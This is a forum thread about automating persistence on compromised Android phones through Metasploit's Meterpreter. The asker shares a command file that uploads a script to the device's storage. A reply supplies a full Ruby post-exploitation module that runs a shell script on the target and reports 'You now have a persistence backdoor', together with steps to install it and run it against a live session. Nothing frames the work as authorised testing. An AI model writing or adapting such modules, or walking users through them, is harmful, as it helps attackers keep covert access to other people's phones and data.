Forum Thread: How to Autorun Android Command Through Shell in Meterpreter?

I've been at this for days to no avail. I'm having issues with automating persistence within Android on connection of a Meterpreter session.

I've been playing around with the information at this link, quite successfully I might add. However, the issue arises when I try to drop into a shell and run commands on that shell within Android.

The target is to upload a .sh file on connection, drop to a shell and then execute this command. The automation gets as far as "shell 1 process created" then ends. It's driving me up the wall.

Here is what I have written in my command file:

cd /
cd /sdcard/download
upload /root/Desktop/AndroidAutorun/
cd /
cd /sdcard/Download

As I mentioned, it executes flawlessly until shell, then nothing happens.

I'm relatively new to Linux commands and am learning as I go along, please forgive me if it's unbelievably obvious. Does anybody have any idea what I'm missing?

2 Responses

I think I might have a solution to the problem.
I created a post Android module:
touch postmodule.rb
Copy it to the Metasploit source directory:
cp postmodule.rb /usr/share/metasploit-framework/modules/post/android/manage/
Now paste this code into the postmodule.rb file in the Metasploit folder:

class MetasploitModule < Msf::Post
  include Msf::Post::Common

  def initialize(info = {})
    super(update_info(info, {
      'Name' => "script_runner",
      'Description' => %q{
        This module runs any .sh script on android using android shell
      },
      'License' => MSF_LICENSE,
      'Author' => 'Anonymous',
      'SessionTypes' => ['meterpreter'],
      'Platform' => 'android'
    }))
  end

  def run
    print_status("Running persistence script")
    cmd_exec("sh /sdcard/")

    print_status("You now have a persistence backdoor")
  end
end

Notice in the code you need to name the file and upload it to /sdcard before you run the post module.

Now when that is finished, you:
background the Meterpreter session by running
run the post module by
use post/android/manage/postmodule.rb
set session <metasploit sessions>
to know your Metasploit session type
finally run the post module by typing

You could write the .rc file to automatically background the sessions and run the post module; I am suspecting that you already know this. I had this same problem and didn't know what to do, then I wondered how Metasploit runs a post module. I checked out one of the post module scripts, and having prior programming knowledge of Python I was able to understand the Ruby code. Anyway, what I understand is that in the common.rb file there is a class, I can't remember which, but it has the cmd_exec method. I'm not sure, but I think this method guesses the kind of Meterpreter session you have, either Android or Windows, and then I create a channel of some sort, not sure, maybe someone could explain. Anyway, with this you could run any non-root command. This was very simple, but the point is you just have to read and understand. I think I will do some further researching to add rooted commands. I think there is another file or class called :priv which will do this, I'm not sure.

OH BTW I created this account with temp mail so I don't know if this post will last lol
